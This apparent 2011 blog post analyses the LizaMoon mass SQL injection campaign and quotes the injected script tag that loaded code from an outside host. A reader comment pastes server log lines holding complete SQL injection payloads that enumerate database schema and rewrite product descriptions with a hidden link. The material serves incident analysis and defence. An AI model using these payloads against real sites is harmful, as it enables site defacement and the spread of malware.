What a match it was, since yesterday morning, I was trying to concentrate on LizaMoon and a small IPC code, but the ICC World Cup Semi-Final, got the better of me.
Now, back to work and here is the analysis of Lizamoon.
Google Search for LizaMoon, reveals 250,000 + results.
What exactly is LizaMoon:
Lizamoon, is a mass-injection attack which inserts the following code into the web-pages.
<script src=hxxp://lizamoon.com/ur.php></script>
The script contained a simple javascript code which redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in . As of this moment the av site and lizaoon sites are unavailable.
Some of the site admins have taken the steps to remove this code injection. Link
This is the only information, which is available on internet about Lizamoon, rest all are spin-offs.
At a first glance, its quite surprising to find 2,50,000 + infected urls, and secondly, majority of the infected sites were running on IIS and W2k3.
This was a mass SQL injection attack and for the first time, someone has gone to such an extent to inject the code on multiple sites.
What I presume is that an automated system was used to search for vulnerable servers.
9 Comments
freesoft
Thank you..really informative!!
Sook
Where exactly is the facebook like button ?
Cortez
hi, superb blog site, and a very good understand! at least one for my bookmarking.
eivai
Good to see that some people really write good content nowadays. Offtopic: I don’t know why but i’m having javascript errors viewing your website on Internet Explorer.. can you check it please? Best Regards
Stanford Thall
I really like what you post here. Very insightful and intelligent. One problem though. I’m running Opera with Debian and parts of your current layout pieces are a little wonky. I realize it’s not a typical set up. Yet it’s something to keep in mind. I hope that it will help and continue to keep up the top quality writing.
R Sachin
Hello,
Your query has been forwarded. we will check it out.
regards
Sachin R
botox Kraków
I quite enjoy what you submit right here. Particularly insightful and intelligent. One concern though. I’m running Firefox with Debian and parts of your current web design pieces are a little wonky. I realize it’s not a popular set up. But it’s an issue to hold in the mind. I wish that it will probably help and keep the top rated quality writing.
R Sachin
Hello,
We are looking into this . hopefully the issue will be resolved before the next blog is published.
regards
Sachin R
Leon
Interesting blog.
It seems like the attack happens in two separate steps:
1. Get table and column structure
=============================
The attacker visits and get information on the table and column structure of the database with the following (as I picked up from the IIS log files on a site I have that got infected – Windows 2008, IIS7 and SQL Server 2008):
2011-04-09 22:49:17 myserverip GET /ViewProduct.aspx
ProductId=1%27%20or%201%3D(select%20top%201%20cast(checksum(*)%20as%20nvarchar)%2Bchar(0x7e)%2Btable%5Fname%20from%20information%5Fschema.tables%20%20where%20checksum(*)%3E-1196899800%20order%20by%20checksum(*))–
80 – 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 519 …lots
of these
so from the information_schema.tables view it gets the table names.
Then it gets the column names as follows:
2011-04-09 22:49:28 myserverip GET /ViewProduct.aspx
ProductId=1%27%20or%201%3D(select%20top%201%20cast(ordinal%5Fposition%20as%20nvarchar)%2Bchar(0x7e)%2Bcolumn%5Fname%2Bchar(0x7e)%2Bdata%5Ftype%20from%20information%5Fschema.columns%20where%20ordinal%5Fposition%3D1%20%20and%20table%5Fname%3Dchar(111)%2Bchar(114)%2Bchar(100)%2Bchar(101)%2Bchar(114)%2Bchar(105)%2Bchar(116)%2Bchar(101)%2Bchar(109)%20order%20by%20ordinal%5Fposition)–
80 – 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 785 …
lots of these as well
from the information_schema.columns view
2. Malicious table update
===================
A few days later other visits happen. As the attacker now has the database structure – he can be very specific and update Description columns with the junk.
2011-04-19 15:32:58 myserverip GET /products.aspx
Category=Paintball%20Kits1’+update+product+set+Description=cast(Description+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(97)%2Bchar(32)%2Bchar(115)%2Bchar(116)%2Bchar(121)%2Bchar(108)%2Bchar(101)%2Bchar(61)%2Bchar(100)%2Bchar(105)%2Bchar(115)%2Bchar(112)%2Bchar(108)%2Bchar(97)%2Bchar(121)%2Bchar(58)%2Bchar(110)%2Bchar(111)%2Bchar(110)%2Bchar(101)%2Bchar(59)%2Bchar(32)%2Bchar(104)%2Bchar(114)%2Bchar(101)%2Bchar(102)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(102)%2Bchar(117)%2Bchar(108)%2Bchar(97)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(32)%2Bchar(62)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(60)%2Bchar(47)%2Bchar(97)%2Bchar(62)+as+varchar(8000))–
80 – 194.28.44.190
Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/
Hope it helps someone